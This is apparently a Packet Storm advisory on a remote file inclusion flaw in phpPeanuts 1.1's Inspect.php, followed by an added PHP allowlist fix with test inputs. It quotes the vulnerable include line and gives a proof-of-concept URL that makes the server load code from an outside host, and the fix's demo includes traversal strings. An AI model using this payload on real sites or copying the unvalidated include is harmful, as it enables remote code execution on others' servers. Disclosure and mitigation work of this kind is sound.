phppeanuts-rfi.txt

2006-11-16T00:00:00
ID PACKETSTORM:52181
Type packetstorm
Reporter Hidayat Sagita
Modified 2006-11-16T00:00:00

Description

                                        
.:: Preface ::.  
  
Type : Remote File Include  
Scripts : Phppeanuts 1.1  
Download : http://scripts.ringsworld.com/development-tools/phppeanuts-1-1.zip  
Found by : Hidayat Sagita aka bomm_3x  
Contact : hidayat.sagita[at]gmail[dot]com  
  
.:: What ? ::.  
  
In the Inspect.php file, on lines 4 and 5 :  
  
4. if ( isSet($_REQUEST["Include"]) )  
5. include $_REQUEST["Include"];  
  
The "Include" request variable is passed to include without being validated first.  
  
.:: Proof Of Concept ::.  
  
http://site/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://yoursite/evil_code.txt ?  
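
One way to close the hole described above, given as an added example that is not part of the original advisory or of phpPeanuts: the request value is mapped through an allowlist to a local file instead of being handed to include. The function name resolveInclude, the allowlist keys and the file names are hypothetical.

```php
<?php
// Added example, not phpPeanuts code. resolveInclude(), the allowlist keys
// and the file names are hypothetical.

// Map a request-supplied name to a vetted local file, or return null.
function resolveInclude(string $name, string $baseDir, array $allowed): ?string
{
    // 1. Allowlist lookup: only known keys match, so URLs, stream wrappers
    //    and traversal strings taken from the request are never used as a path.
    if (!array_key_exists($name, $allowed)) {
        return null;
    }
    // 2. Resolve symlinks and ".." segments; a missing file yields false.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$name]);
    if ($base === false || $path === false) {
        return null;
    }
    // 3. Containment: catches an allowlist entry that points outside $baseDir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo files: one inside the include directory, one outside it.
$pid = getmypid();
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "inc_demo_$pid";
$outside = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "outside_$pid.php";
mkdir($dir);
file_put_contents("$dir/TestA.php", '<?php echo "TestA loaded\n";');
file_put_contents($outside, '<?php echo "must never load\n";');
$allowed = ['testA' => 'TestA.php', 'escape' => "../outside_$pid.php"];

// Constructed request values; the second has the shape of the advisory's PoC.
$samples = ['testA', 'http://yoursite/evil_code.txt', '../../etc/passwd', 'escape'];
foreach ($samples as $value) {
    $path = resolveInclude($value, $dir, $allowed);
    if ($path === null) {
        echo "rejected: $value\n";
        continue;
    }
    include $path; // only ever a path produced by resolveInclude()
}
unlink("$dir/TestA.php");
unlink($outside);
rmdir($dir);
```

Setting allow_url_include = Off in php.ini (available since PHP 5.2) additionally stops include from fetching http:// URLs, but it does not address inclusion of local files, which the allowlist covers.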
  
.:: Shoutz ::.  
  
eCHo staff, az001 and All newbz.  